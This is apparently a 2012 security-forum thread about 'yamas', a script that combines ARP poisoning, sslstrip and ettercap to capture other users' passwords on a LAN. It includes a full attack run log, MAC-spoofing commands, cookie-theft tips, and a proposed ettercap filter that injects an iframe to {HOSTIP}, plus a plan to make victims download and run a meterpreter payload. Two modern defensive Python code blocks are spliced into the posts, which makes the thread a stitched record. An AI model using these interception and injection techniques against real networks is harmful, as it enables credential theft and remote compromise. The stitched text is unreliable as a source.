I used your script and I have to say it's more stable and effective than ettercap! Easy to download and install, and I got it working within minutes, unlike otherwise, where every time I fix something, something else comes up. So thank you very much for your script,

merci beaucoup :-)

With all due respect to ComaX and his awesome script and hard work. (ComaX you know I'm a huge fan/supporter) wewe73, I must break words with you about the stability and effectiveness of ettercap. Do tell? What are your issues, perhaps something that could be fixed?

If there are issues with ettercap, please let us know and we'd be happy to research, address, fix them.

Best regards,
J0hnnyBrav0

wewe73
04-08-2012, 04:11 PM
Hi J0hnnyBrav0

First of all I must thank you for easy-creds, it's an awesome tool and I love it! Much appreciated,
And thank you for your interest and for offering your help with ettercap,
First issue with ettercap-gtk is when I was scanning for hosts it shut down!
After a day searching the forum and googling I managed to find a fix for that,
had a problem with arp poisoning, when I check if the poisoning had success, it says no poisoning between 192.168.X.X -> 192.168.X.XX, that has been fixed too
now the problem is ettercap-gtk doesn't show anything like logins and passwds!
My command was simple, just ettercap-gtk, and of course I have edited etter.conf and uncommented both lines in iptables for linux to be able to read it. I am confused to be honest, it could be me, not ettercap, after all!

your help will be really appreciated,

Kind Regards
issak

ira787
04-08-2012, 07:26 PM
This script is getting very close to perfection! Thank you!!

I added a few lines to mine, just to anonymize for fun:

ifconfig eth0 down
sleep 2
macchanger -e eth0
ifconfig eth0 up
dhclient eth0
sleep 1
These take eth0 offline, then spoof the mac, keeping the same vendor, then reconnects eth0 to the network.

whjte
04-09-2012, 03:50 AM
Hello. First of all thanks for the great script you're sharing with us. I just have one question: how can I catch auto-login enabled passwords with YAMAS? I mean when the user has checked the "remember me" option in his browser?
Thanks in advance.

whjte
04-09-2012, 03:50 AM
Hello. First of all thanks for the great script you're sharing with us. I just have one question: how can I catch auto-login enabled passwords with YAMAS? I mean when the user has checked the "remember me" option in his browser?
Thanks in advance.

comaX
04-09-2012, 04:00 AM
This script is getting very close to perfection! Thank you!!

I added a few lines to mine, just to anonymize for fun:

ifconfig eth0 down
sleep 2
macchanger -e eth0
ifconfig eth0 up
dhclient eth0
sleep 1
These take eth0 offline, then spoof the mac, keeping the same vendor, then reconnects eth0 to the network.

That's a good idea ! I intentionally didn't put something like that because I expect people needing anonymity to do what is necessary to be anonymous... Anyway, thanks for sharing !


Hello. First of all thanks for the great script you're sharing with us. I just have one question: how can I catch auto-login enabled passwords with YAMAS? I mean when the user has checked the "remember me" option in his browser?
Thanks in advance.

Well, you cannot ! Because the password isn't transmitted in this case, but a cookie is. You can sniff cookies and use them with Wireshark for instance.
With that said, sslstrip has an option (-k) that is enabled in yamas that is supposed to kill sessions by preventing cookies from being sent, hence forcing reauthentication, which can then be sniffed.

Thanks to all you guys for your posts ;)

ericmilam
04-09-2012, 10:34 AM
Hi J0hnnyBrav0

First of all I must thank you for easy-creds, it's an awesome tool and I love it! Much appreciated,
And thank you for your interest and for offering your help with ettercap,
First issue with ettercap-gtk is when I was scanning for hosts it shut down!
After a day searching the forum and googling I managed to find a fix for that,
had a problem with arp poisoning, when I check if the poisoning had success, it says no poisoning between 192.168.X.X -> 192.168.X.XX, that has been fixed too
now the problem is ettercap-gtk doesn't show anything like logins and passwds!
My command was simple, just ettercap-gtk, and of course I have edited etter.conf and uncommented both lines in iptables for linux to be able to read it. I am confused to be honest, it could be me, not ettercap, after all!

your help will be really appreciated,

Kind Regards
issak

Are you running the latest version? We fixed a lot of that. And GTK sucks anyway; learn to use the CLI. That sounds like an old issue to me, but I have seen it for Win7, which isn't supported.

Latest version is 0.7.4.1-Lazarus.

ShadowMaster
04-09-2012, 11:55 AM
comaX, I don't know whether you have updated your script beyond the feb 12 version, mainly because I have yet to confirm the update bug being fixed because I still get no updates available. Are there any? Like the allowing of anonymity as a default? If yes, then the bug still exists... If not, can you add a -u like we talked about, or the anonymity which seems cool, so that I can confirm the bug being gone? Thanks :)

wewe73
04-09-2012, 12:21 PM
double post

wewe73
04-09-2012, 12:21 PM
Hi, hope you well and thanks for your reply.

My laptop is Win7 and yes, I am running it on BT5-R2 KDK-32bit Gnome 32bit on VM and a 64bit HDD install, so I assume it's the latest version. I never run ettercap on Win7, but I use Win7 as a victim; does ettercap not work against Win7? I think I am wrong :-)
Anyways, I thank you so much for your help and will definitely take your advice on board and start learning to use the CLI, and I will post my feedback somewhere. I am sure I've seen a post somewhere on the forum mentioning the CLI; I think it's best to learn it and start making use of the keyboard :-)

thanks

Sorry for the double post, and sorry to comaX for using his thread to discuss ettercap, sorry comaX again :o

comaX
04-10-2012, 09:16 AM
comaX, I don't know whether you have updated your script beyond the feb 12 version, mainly because I have yet to confirm the update bug being fixed because I still get no updates available. Are there any? Like the allowing of anonymity as a default? If yes, then the bug still exists... If not, can you add a -u like we talked about, or the anonymity which seems cool, so that I can confirm the bug being gone? Thanks :)

Oh, my. I don't know what the hell I've done, but there no longer is a version number in the script... I'll check this ASAP. No wonder you didn't get updates... To know if you have the last one, you can check if you have the logs in a directory with the date. Or just grab the latest from my website : http://comax.fr/yamas/bt5/yamas.sh
For the anonymity stuff, I must have said things not clearly : it is on purpose that there ISN'T one !

Thanks for pointing the issue out. As for the update stuff, I believe I did something related to it, but it's been a while since I worked on the code and my memory is that of a goldfish !


Hi, hope you well and thanks for your reply.

My laptop is Win7 and yes, I am running it on BT5-R2 KDK-32bit Gnome 32bit on VM and a 64bit HDD install, so I assume it's the latest version. I never run ettercap on Win7, but I use Win7 as a victim; does ettercap not work against Win7? I think I am wrong :-)
Anyways, I thank you so much for your help and will definitely take your advice on board and start learning to use the CLI, and I will post my feedback somewhere. I am sure I've seen a post somewhere on the forum mentioning the CLI; I think it's best to learn it and start making use of the keyboard :-)

thanks

Sorry for the double post, and sorry to comaX for using his thread to discuss ettercap, sorry comaX again :o

No problem ! A good way to see it is that it bumps the thread ;)

chip28
04-30-2012, 02:23 AM
Hey Thanks for the terrific script, works flawlessly for me.
I added the same as Ira787 for the macchanging business, so that would be a useful thing to add, but I understand the reasoning behind not implementing it. A really useful addition that you could add would be some sort of hostname/ip tagging for the user/pass output.

That way when you scrape a user/password it would let you know where you got it from, example:

Website = twitter.com
Login = <username>
Password = <password>
Host = chip28.cz.eu <- fqdn

or if it would separate the log into several logs, one per machine, that would work too!

Thanks again!
Chip28

comaX
04-30-2012, 08:24 AM
First, my apologies to all. It has been exhausting weeks for me lately and I didn't do shit. I'll try to do what should be done ASAP but I'm having midterm(?) exams for the next two weeks, so I might not have so much time.



Hey Thanks for the terrific script, works flawlessly for me.
I added the same as Ira787 for the macchanging business, so that would be a useful thing to add, but I understand the reasoning behind not implementing it. A really useful addition that you could add would be some sort of hostname/ip tagging for the user/pass output.

That way when you scrape a user/password it would let you know where you got it from, example:

Website = twitter.com
Login = <username>
Password = <password>
Host = chip28.cz.eu <- fqdn

or if it would separate the log into several logs, one per machine, that would work too!

Thanks again!
Chip28

I thought about that at the very beginning of the script but it turned out it's impossible to do :
- the parsing is already very heavy CPU-wise
- it's complicated to parse more
- adding the website was hard as fu*ck
- Sslstrip logs don't differentiate between local hosts (afaik), so I can't do anything about that. If you're really talking about FQDN, then it's pretty much the website, or am I beside the point ?

On a non-related topic : I tried it on the last Ubuntu (12.04) and everything seems to work, so I don't get why people want me to do an "Ubuntu version". (Not that you BT users ask this, but in case someone out of the community reads this...)

Cheers !

voidnecron
05-08-2012, 02:56 PM
Sorry to dig up such an old post, but I just started using it and found the following things 'weird':

Do you want to keep the whole log file for further use or shall we delete it? (Y=keep)
You might want to rename 'keep' to 'save' and add 'N=don't save' or something, just to clarify.

Same goes for this
Do you want to save passwords to a file? (Y=keep)

During startup it checks if the script is installed to /usr/bin and at my setup it IS installed, however it came up with this:
This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)
y
cp: `/usr/bin/yamas' and `/usr/bin/yamas' are the same file
Script installed !
You might want to recheck this check.

Great stuff furthermore, thanks for this!

voidnecron
05-08-2012, 02:57 PM
Sorry to dig up such an old post, but I just started using it and found the following things 'weird':

Do you want to keep the whole log file for further use or shall we delete it? (Y=keep)
You might want to rename 'keep' to 'save' and add 'N=don't save' or something, just to clarify.

Same goes for this
Do you want to save passwords to a file? (Y=keep)

During startup it checks if the script is installed to /usr/bin and at my setup it IS installed, however it came up with this:
This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)
y
cp: `/usr/bin/yamas' and `/usr/bin/yamas' are the same file
Script installed !
You might want to recheck this check.

Great stuff furthermore, thanks for this!

cabo81
06-21-2012, 05:31 PM
Hi group

This is my first post. First I want to thank to ComaX for this incredible script.

This is my question. I've been playing with the script and it works for yahoo, hotmail and facebook. But not with gmail. Is there any workaround for retrieving the gmail passwords?

I saw nothing on forum.

Thanks in advance.

comaX
06-22-2012, 12:39 AM
It's been a while since I tested it, so the parser might be out of date, but I doubt it. Gmail enforces https connections, so by definition, sslstrip can't get anything from it. I'll test when I have time (probably early july I think...) but I'm pretty sure it all comes down to this.

cabo81
06-22-2012, 03:48 PM
Thanks for your answer. I'll be waiting and continue testing

zatixiz
06-23-2012, 11:39 AM
Really good script ComaX, I've used it a lot and it never seems to fail me!
There were some small bugs last time I used it but nothing important really, keep the good work up! :)

ShadowMaster
06-24-2012, 11:24 AM
gmail defaults to https and on most browsers can't be worked around. Sorry...

comaX
06-27-2012, 01:01 PM
gmail defaults to https and on most browsers can't be worked around. Sorry...

Thanks for confirming ;) Other sites should take the example and do the same. At least the important websites like banks, FB, and the like. I find it intolerable that an online banking service doesn't require an MD5 hash to be transmitted on an https-only connection ; enabling anyone with a computer to hack about.
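Two points in this thread come down to the same server-side controls: the earlier "remember me" discussion (the password is never sent, but the session cookie is, and a cookie without the Secure attribute travels over plain HTTP where it can be read), and the gmail discussion just above (a site that is https-only, and that tells browsers so with a Strict-Transport-Security header, gives a downgrading proxy nothing to strip, because the browser refuses to speak HTTP to it). The following is an added example, not code from the thread or from yamas, that audits a response's headers for both properties. The header values are constructed for the example, not captured from any real site, and the one-day minimum for max-age is an assumption chosen for illustration.

```python
from typing import Dict, List, Optional, Tuple

# Constructed sample response headers (not captured from any real site).
GOOD_HEADERS: List[Tuple[str, str]] = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]
WEAK_HEADERS: List[Tuple[str, str]] = [
    ("Set-Cookie", "remember_me=tok; Path=/; Expires=Sat, 01 Jan 2030 00:00:00 GMT"),
    ("Set-Cookie", "prefs=dark; Path=/; Secure"),
]

MIN_HSTS_AGE = 86400  # one day; threshold is an assumption for this example


def parse_hsts(value: Optional[str]) -> Dict[str, object]:
    """Split a Strict-Transport-Security value into its directives (RFC 6797 syntax)."""
    result: Dict[str, object] = {"present": value is not None, "max_age": 0, "include_subdomains": False}
    if value is None:
        return result
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.lower()
        if name == "max-age" and arg.strip().isdigit():
            result["max_age"] = int(arg)
        elif name == "includesubdomains":
            result["include_subdomains"] = True
    return result


def cookie_flags(set_cookie: str) -> Dict[str, object]:
    """Cookie name plus whether the Secure and HttpOnly attributes are set."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.lower() for p in parts[1:]}
    return {"name": name, "secure": "secure" in attrs, "httponly": "httponly" in attrs}


def audit(headers: List[Tuple[str, str]]) -> List[str]:
    """Return findings describing what a passive observer of plain HTTP could obtain."""
    findings: List[str] = []
    hsts_value = next((v for k, v in headers if k.lower() == "strict-transport-security"), None)
    hsts = parse_hsts(hsts_value)
    if not hsts["present"]:
        findings.append("no HSTS: a first HTTP request can be kept on HTTP")
    elif int(hsts["max_age"]) < MIN_HSTS_AGE:
        findings.append(f"HSTS max-age too short ({hsts['max_age']}s)")
    for k, v in headers:
        if k.lower() != "set-cookie":
            continue
        c = cookie_flags(v)
        if not c["secure"]:
            findings.append(f"cookie {c['name']} lacks Secure: sent over plain HTTP")
        if not c["httponly"]:
            findings.append(f"cookie {c['name']} lacks HttpOnly: readable by page scripts")
    return findings


if __name__ == "__main__":
    for label, hdrs in (("good", GOOD_HEADERS), ("weak", WEAK_HEADERS)):
        print(label, audit(hdrs) or ["no findings"])
```

The HSTS check only protects a browser that has already seen the header once over HTTPS (or has the site in its preload list); the "no HSTS" finding is about that first plain-HTTP visit, which is exactly the window a downgrade relies on.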

ShadowMaster
06-27-2012, 01:33 PM
Very true. btw comaX can you do some small update to confirm the fix of the updating bug I found. There have been no updates since then, therefore I can't confirm...

comaX
06-27-2012, 01:55 PM
Yes I remember you talking about that, and I checked my code but didn't notice anything weird or not working during tests... Could you tell me again what was wrong and if it still is, so that I can check specifically for that ? I now have time on my hands, so I should be more active in case of requests and all !

Cheers !

ShadowMaster
06-27-2012, 02:16 PM
It said no update was available yet there were several updates that should have been. So it was improperly connecting or something. It got the MoTD but not the new update...
You said it was fixed, but I was unable to confirm.

comaX
06-27-2012, 02:44 PM
It said no update was available yet there were several updates that should have been. So it was improperly connecting or something. It got the MoTD but not the new update...
You said it was fixed, but I was unable to confirm.

Oh yeah, that was because of a bad cron table on my server that didn't update the "version" file correctly. Now it should be all good !

ShadowMaster
06-27-2012, 02:59 PM
Cool. Thanks.

hannah
06-28-2012, 07:35 AM
Hi comaX. Many thanks for this wonderful script. I have read through all 18 pages of comments and also watched the video. I have downloaded and installed the script on my machine. Everything seems to run smoothly, however when I log in to twitter / hotmail (I am manually typing the login / password) I do not get these captured. Please note that I have also used the yamas -e option too. I am sure there are some settings on my machine which need to be fixed but I just do not know which need fixing.

My Machine:
BackTrack 5 R2 Gnome 64 bit : Linux bt 3.2.6 x86_64 GNU/Linux : HDD installed.

Note the messages as I launch yamas



[+] Cleaning iptables
[-] Cleaned.

[+] Activating IP forwarding...
[-] Activated.

[+] Configuring iptables...
To what port should the traffic be redirected to? (default = 8080)

Port 8080 selected as default.

From what port should the traffic be redirected to? (default = 80)

Port 80 selected as default.


Traffic from port 80 will be redirected to port 8080
[-] Traffic rerouted

[+] Activating sslstrip...
Choose filename to output : (default = yamas)

Sslstrip will be listening on port 8080 and outputting log in /tmp/yamas.txt

sslstrip 0.9 by Moxie Marlinspike running...

[-] Sslstrip is running.


[+] Activating ARP cache poisoning...

Gateway : 192.168.1.1 Interface : wlan0

Enter IP gateway adress or press enter to use 192.168.1.1.

192.168.1.1 selected as default.


What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.

wlan0 selected as default.


We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D.
Press enter to default.


Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof
[-] Arp cache poisoning is launched. Keep new window(s) running.

Attack should be running smooth, enjoy.



Attack is running. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.

Enter the number of the desired option.

Please note the interface and gateway ip are correct.

Many thanks again.
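The run above shows what the attacking side looks like: the whole 192.168.1.1 network is poisoned so that every host's ARP cache ends up pointing the gateway's IP at the attacker's MAC. From the other side of the table, that is also the simplest thing to detect. The following is an added example, not part of the thread or of yamas, that compares two neighbour-table snapshots in the shape of `ip neigh show` output and flags two signals: the gateway's MAC changing, and one MAC answering for several IPs. The snapshots are constructed for the example (addresses and MACs are made up); the second signal can also occur legitimately, for instance on a router holding several addresses, so treat it as a prompt to look, not as proof.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed neighbour-table snapshots in the shape of `ip neigh show` output.
# BASELINE is taken while the network is known-good; LATER is taken afterwards.
BASELINE = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.20 dev wlan0 lladdr 66:77:88:99:aa:bb STALE
192.168.1.30 dev wlan0 lladdr cc:dd:ee:ff:00:11 REACHABLE
"""
LATER = """\
192.168.1.1 dev wlan0 lladdr cc:dd:ee:ff:00:11 REACHABLE
192.168.1.20 dev wlan0 lladdr 66:77:88:99:aa:bb STALE
192.168.1.30 dev wlan0 lladdr cc:dd:ee:ff:00:11 REACHABLE
192.168.1.40 dev wlan0 FAILED
"""

# Entries without a link-layer address (FAILED / INCOMPLETE) carry no "lladdr"
# and are deliberately skipped by this pattern.
NEIGH_RE = re.compile(r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>[0-9a-f:]{17})", re.I)


def parse_neigh(text: str) -> Dict[str, str]:
    """Map IP -> lowercase MAC for every entry that has a link-layer address."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_anomalies(baseline: str, current: str, gateway: str) -> List[str]:
    """Flag a changed gateway MAC and any MAC that claims more than one IP."""
    before, now = parse_neigh(baseline), parse_neigh(current)
    alerts: List[str] = []
    if gateway in before and gateway in now and before[gateway] != now[gateway]:
        alerts.append(f"gateway {gateway} MAC changed {before[gateway]} -> {now[gateway]}")
    by_mac: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in now.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for alert in find_anomalies(BASELINE, LATER, "192.168.1.1") or ["no anomalies"]:
        print(alert)
```

In practice the baseline is the gateway's MAC recorded while the network is trusted (or the value printed on the router), and the check is run periodically against the live table; a static ARP entry for the gateway is the corresponding mitigation on hosts that cannot rely on switch-side protections.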

ShadowMaster
06-28-2012, 08:11 AM
Try using mon0 after setting up wlan0 to run in monitor mode with airmon-ng.

hannah
06-28-2012, 04:24 PM
Try using mon0 after setting up wlan0 to run in monitor mode with airmon-ng.

Hey thanks, but how would using mon0 work? mon0 is to sniff traffic and it cannot associate with an AP. In order to sniff logins/passwords you need to be MITM and mon0 cannot do that.

ShadowMaster
06-28-2012, 04:31 PM
Since when can mon0 not associate with an AP? All monitor mode does is enable the ability to sniff raw packet frames from the ether. This is the first I ever heard about monitor mode decreasing functionality...

comaX
06-29-2012, 04:55 AM
Hi comaX. Many thanks for this wonderful script. I have read through all 18 pages of comments and also watched the video. I have downloaded and installed the script on my machine. Everything seems to run smoothly, however when I log in to twitter / hotmail (I am manually typing the login / password) I do not get these captured. Please note that I have also used the yamas -e option too. I am sure there are some settings on my machine which need to be fixed but I just do not know which need fixing.

My Machine:
BackTrack 5 R2 Gnome 64 bit : Linux bt 3.2.6 x86_64 GNU/Linux : HDD installed.

Please note the interface and gateway ip are correct.

Many thanks again.

Hi, thanks for reading it all before posting, even I wouldn't go this far. You say it doesn't work for hotmail / twitter. Does it work for others ? Have you tried in private browsing mode to avoid anything being transmitted via cookies for instance ? Did you make sure you were not on an https connection ? Some sites like gmail enforce this type of connection, rendering sslstrip/ettercap useless.
Since you're using ettercap, have you tried using sslstrip ?

As for the mon0/wlan0, it's not really relevant here. Indeed I don't think you can associate with an AP in monitor mode, but what you can do is be connected with wlan0 to an AP, and have a pseudo-interface mon0 in monitor mode. In a nutshell, mon0 itself doesn't connect, but the wireless interface can be connected, and in monitor mode.
But once again, I don't really see how that is relevant here, so unless you guys explain in more details, let's just forget that.

I have some more ideas, but more troubling too, so I'll wait for your feedback before conjecturing horrid stuff :p

//

I'll risk getting my ass kicked because it's absolutely irrelevant to Backtrack, but there is this project I started that needs help growing : http://msimdb.comax.fr It's a database of movie quotes in music. It suffers greatly from content and anything non-metal. So if you guys are willing to help in anyway you can think of, I'll be super glad ! Mods, sorry for doing this.

hannah
06-29-2012, 07:37 AM
Hi, thanks for reading it all before posting, even I wouldn't go this far. You say it doesn't work for hotmail / twitter. Does it work for others ? Have you tried in private browsing mode to avoid anything being transmitted via cookies for instance ? Did you make sure you were not on an https connection ? Some sites like gmail enforce this type of connection, rendering sslstrip/ettercap useless.
Since you're using ettercap, have you tried using sslstrip ?


BTW: I am running version 20120213

First of all I have tried both options with yamas, I mean the default with sslstrip and with yamas -e (which activates ettercap). I have now used a browser with all cookies cleared. I have tried both https and http authentication sites.

Password box does not show me anything.

I am sure this script works, as it's working for everyone else it seems. Is there a debug option in this script? The help file does not say if there is any. Any idea will be appreciated.

@ShadowMaster
Now in regards to the mon0 issue, what I meant is that you cannot get an ip address from an AP through mon0. Hence no gateway, and this script is not going to work. Please correct me if I am wrong here.

Always willing to learn.

Regards

ShadowMaster
06-29-2012, 08:55 AM
@comaX Ideas are always welcome, no matter how troubling they may be.

@hannah Why not do what comaX said, which is what I meant, just in more detail. Basically associate with wlan0 and create a pseudo-interface mon0? Also, setting your own default gateway is really not hard... route gw {ip} or something very similar, don't remember off hand sorry. I'd be more worried about the no ip, which is also easy to set...

comaX
06-29-2012, 11:05 AM
@comaX Ideas are always welcome, no matter how troubling they may be.

The troubling idea would be that they changed the authentication process and I might have to change the parser, which was a pain in the arse back then, and now that I don't have everything in mind, I fear it would be again, with the necessity to first understand what I wrote back then... So yeah, it's troubling :p

@Hannah : you didn't tell me if it worked for other sites or not. Are you using a local connection page maybe ? (fr.msn.com ; us.msn.com... I just made them up, but you know what I mean)

ShadowMaster
06-29-2012, 11:16 AM
comaX, I know that feel bro. I am writing a perl script to help with ASM ghostwriting automation, and since I don't really know perl, and refuse to write it in py, I basically lost track of the number of times I've had to rewrite portions and figure out what I wanted to do with them. Incidentally, anyone who knows perl and is willing to help would be amazing. I don't want to post it in the forums until it's done though.

hannah
06-29-2012, 05:25 PM
@Hannah : you didn't tell me if it worked for other sites or not. Are you using a local connection page maybe ? (fr.msn.com ; us.msn.com... I just made them up, but you know what I mean)

No, so far it did not work for any other sites either. Yes, I have tried sites like http://www.backtrack-linux.org/ as well, which is not https. Anyway, is there any config file (e.g. etter.conf) I need to manually change, or does your script do that automatically?

What I am thinking now is to get sslstrip / ettercap manually working on my machine and then proceed.

@ShadowMaster: Will heed your advice.

hannah
06-29-2012, 07:01 PM
Well all sorted now.. first of all thanks a lot for this beautiful script..works like a charm. Now about my stupidity :o

Basically I was sniffing my own ip (the Backtrack machine), the same machine from which I was launching the attack.

Anyway ran another virtual machine and logged in various accounts from that VM and your script is working like a charm. Thanks a lot comaX.

comaX
06-29-2012, 08:35 PM
Well all sorted now.. first of all thanks a lot for this beautiful script..works like a charm. Now about my stupidity :o

Basically I was sniffing my own ip (the Backtrack machine), the same machine from which I was launching the attack.

Anyway ran another virtual machine and logged in various accounts from that VM and your script is working like a charm. Thanks a lot comaX.

My pleasure ;) I'm glad you sorted the issue yourself in the end! Next time, do mention VMs, they are "interesting" pieces of work networking wise...

hannah
06-29-2012, 10:11 PM
My pleasure ;) I'm glad you sorted the issue yourself in the end! Next time, do mention VMs, they are "interesting" pieces of work networking wise...

I am glad too. And thanks to you for your script.

Cheers

comaX
08-26-2012, 05:45 PM
Hi everyone ! I just updated Yamas for R3, go and grab it ! http://yamas.comax.fr

Please report any problem, even if it should run just fine with BT5R3 !

ShadowMaster
09-04-2012, 08:14 AM
Hey man, great script as usual blah blah blah. Two things.
1) I can now officially confirm the update bug is gone. :D

2) I have an idea for a new option. Targeted RCE by way of content replacement of HTML. Something like this. ettercap and others have filters that allow for the dynamic replacement of content that is sent to the victim. So instead of doing things like switching "You're hired!" for "You're fired!" as a prank, do things like switch "</HTML>" for "<iframe SRC={HOSTIP} width="0" height="0"></iframe></HTML>" to redirect him to your waiting client side exploit. Or better yet, embed evil java script to download and run a client side exe to send a meterpreter session to your waiting listener. Or any payload.

I suggest this here instead of to rel1k for SET because most exploit frameworks are WAN, and this tool is mainly LAN. Let me know what you think...

comaX
09-04-2012, 12:27 PM
It's a good point you're raising and I've thought of doing that before. But here's the thing, the million dollar question : where do I stop ? I intended Yamas to be "another MITM script", not a hack-everything tool (even though, yes, it still pertains to that domain). So, I added stuff here and there because they're easy and fun to use but I still struggle defining where it should stop. A while back I had in mind to do a simplified Yamas : no questions asked, all-automated and more tools, for exploitation for instance. But I don't know, I still can't set my mind to it.
Maybe somehow I think what there is for now is enough, and if you want to exploit by redirecting to your own server, you could/should do it sideways, by yourself. By the way, since there is DNS spoofing, you can already kind of do that ;) but don't tell :p
Modifying the code on-the-fly is something really sweet though. You actually make me want to do that more powerful project. But hey, that won't see the light of the day before a f-ing while !

ShadowMaster
09-04-2012, 05:13 PM
In a bold attempt to convince you to add this to yamas as opposed to making a new tool, here's my logic.
You wrote yamas as a tool to present to people the dangers of ARP-spoofing and MiTM attacks. Any attack that falls under the status of an attack that can be carried out as a *DIRECT RESULT* of a MiTM falls under yamas's domain. To say that yamas is really just a simple tool to snoop, with some advanced features thrown in for fun, is to deny the true purpose and brilliance of the tool.

Yamas's purpose is to provide a framework that people can point to and say "This is why you need X!", whatever X may be. To say that the danger of MiTM starts and ends with passwords and URL's is foolish and naive. There is so much more.
To incorporate RCE with iframe redirection, javascript embedding to an MSF listener, evil JS to download and run a trojan, or XSS to hook to BeEF is to truly be able to say "I have a tool that can show you how truly dangerous MiTM is." to anyone. As the expression goes "You can't argue with a root shell." It's an obvious extension of the tool. It's not a separate tool. MiTM is about what hackers would do in that situation. If a hacker has MiTM access, rest assured he will gain RCE with it. If the pentester can run your tool and show the client the real dangers, then the client will protect himself. If not, nobody cares about theoretics.

To add these to your script would be to fully appreciate what MiTM is, and provide a framework to protect people from it in the long term.

comaX
09-04-2012, 07:40 PM
You, sir, are totally right. I must level with you though: that doesn't mean I'll do it (even if it would be awesome).

Who knows, maybe someday you'll get a pre-release ;)

ShadowMaster
09-04-2012, 07:54 PM
and credit! :D Imma hold you to that though, cuz my explanation was beautiful. :)

ShadowMaster
09-13-2012, 07:59 PM
BUMP... Sorry, but I needed comaX to see this.

Here's a *VERY* easy way to implement the idea I had. Take the filter from here, and paste it into a text file: http://www.hackyeah.com/2010/10/ettercap-filters-with-metasploit-browser_autopwn/
Next, ask the user, what the redirection URL he wants the attackees to be redirected to is.
Replace the URL and IP in there with the user's, and compile the new filter with ettercap, then restart ettercap with that filter. All this assumes that the user has a waiting listener with a payload, be it BeEF, msf, SET or a custom thing. You may need to add a </iframe> after the added iframe, that's something that can come with testing. But this is very simple and easy, and it will demonstrate the danger of MiTM also. :)
Tell me what you think...

comaX
09-14-2012, 02:00 AM
I'm installing BT in a VM so I don't have to reboot each time an idea pops into my head, forcing me to... yes, stop my music. So, I should from now on be more reactive. I then shall start with what you just posted. I'll see what I can make of it.

There will probably be an update in the next few days since some people are experiencing trouble with looping the parsing. It had been a while since I tested it and it seems Facebook sends way too much crap. Am I the only one to get that ? Yes it's still cleaner than looking at sslstrip's logs, but hell, it looks awful. I'll see if I can manage something.

Edit : Updated ! I'm feeling quite good about the modifications made to the parser. Tell me what you think ! It still works with every site I tested.
Edit2 : ShadowMaster, wait a bit before I give feedback to your ideas ;)

ShadowMaster
09-14-2012, 08:01 AM
I shall wait. :)
BTW, the idea itself can be incorporated with an absolute minimum of fuss from the filter I gave, the only issue would be that it can never replace the original filter template, and that even if the script was started with arpspoof, it must be continued with ettercap. I look forward to when this is added to your script. :)

Also, if you go on IRC at all, you should come to #offtopicsec where we can talk more in depth and more responsively about these things.

comaX
09-18-2012, 01:24 PM
Ok, so I read the article. It's very interesting indeed. I think I might implement something similar but not to the full extent. I mean, I could implement html code modifications on the fly, which would allow someone who knows what he's doing to do what you intended. I'll do tests and stuff, and get back to you.

ShadowMaster
09-18-2012, 08:23 PM
I've been obsessing over this for the past few days, and the algo I came up with was this:

Start the script the way it normally starts.
Add an option in additional tools for iframe injection.
If the user runs it, warn him that it will turn off arpspoof and run ettercap.
If the user clicks yes, kill arpspoof, then:

Ask the user for the redirection URL to inject.
Echo the contents of that filter with the redirection URL into a file.
Use ettercap to compile that file.
Run ettercap with the previous port, ip, and netmask to spoof settings, and add the filter to the command.
(At this point everything is the same as if the user had run "yamas -e" but there is the added benefit of the filter.)
Warn the user that the only thing he has accomplished is that the victim will somehow send HTTP requests to the redirection URL, and that the user must supply his own listener to respond to those requests. (This prevents sk1dd13s from seeing your tool as a one-stop pwn tool.)
Move on with the script as normal, with a separate window logging the ettercap replacement messages.

Tell me what you think...

lokitround1
10-02-2012, 07:24 AM
Yep! Works with my setup!

Thank you!!

lokitround1
10-03-2012, 07:15 AM
Perrrffeccttt :D

working well!

comaX
10-03-2012, 07:56 AM
Hey, SM (no pun intended)! I just saw your post (or I forgot I saw it). I have very little time on my hands, but I started working on a more-to-the-point version of Yamas that will include that. Can't say when I'll be done with it; I'm really overbooked by studies.

It's on the way though...

manco1911
10-10-2012, 05:58 PM
Hi man,
first of all I have to congratulate you for this work, it's really awesome.
I have had it on my n900 for some time now, works flawlessly.

I just downloaded the last script on your site though ("20120827") and tried to run it on a BT5R3 VM, and it seems not to work as intended..
Did you have any kind of issue with this?

Running the script seems to do nothing..
If you ^C it, it will output the intended output..
but it won't show any kind of options/menu or anything if you let the script run...

It seems it's not getting out of the Update_process.. (just debugging with echo "test" around.. lol)

Any insights?

BTW it's a recently downloaded VM with nothing modified on it..

airwolf3000
10-10-2012, 10:11 PM
Comax, I have never had any problem with this script, no matter what version. I think it's wonderful and as long as you keep updating it, I'll keep on using it.

Many of us have not thanked you enough for it; there are many people afraid to write a few letters in the post because they get "----" by others, so I think most people are very cautious about what to ask and how to phrase it. (ref: Why is this forum dying, or something like it)

I think you have done a wonderful job and we are lucky that you have shared it.

I will shut up before somebody may have a different say about expressing thanks to you

Thanks Comax

wewe73
11-24-2012, 06:52 PM
Comax, I have never had any problem with this script, no matter what version. I think it's wonderful and as long as you keep updating it, I'll keep on using it.

Many of us have not thanked you enough for it; there are many people afraid to write a few letters in the post because they get "----" by others, so I think most people are very cautious about what to ask and how to phrase it. (ref: Why is this forum dying, or something like it)

I think you have done a wonderful job and we are lucky that you have shared it.

